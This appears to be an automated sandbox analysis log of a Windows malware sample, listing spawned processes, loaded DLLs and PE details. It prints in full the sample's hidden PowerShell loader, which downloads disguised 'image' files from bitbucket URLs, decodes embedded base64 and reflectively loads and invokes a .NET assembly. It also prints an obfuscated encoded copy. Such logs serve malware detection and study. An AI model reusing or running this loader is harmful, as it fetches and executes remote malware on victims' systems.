        Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
        Source: nTHivMbGpg.exeReversingLabs: Detection: 39%
        Source: unknownProcess created: C:\Users\user\Desktop\nTHivMbGpg.exe "C:\Users\user\Desktop\nTHivMbGpg.exe"
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeProcess created: C:\Windows\System32\cmd.exe cmd /c 124.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeProcess created: C:\Windows\System32\cmd.exe cmd /c 124.batJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"Jump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeSection loaded: feclient.dllJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeSection loaded: advpack.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: nTHivMbGpg.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: nTHivMbGpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: nTHivMbGpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: nTHivMbGpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: nTHivMbGpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: nTHivMbGpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: nTHivMbGpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: nTHivMbGpg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: nTHivMbGpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: s\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498B2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: nTHivMbGpg.exe
        Source: Binary string: wextract.pdbGCTL source: nTHivMbGpg.exe
        Source: Binary string: dows\System.Core.pdbL source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: nTHivMbGpg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: nTHivMbGpg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: nTHivMbGpg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: nTHivMbGpg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: nTHivMbGpg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 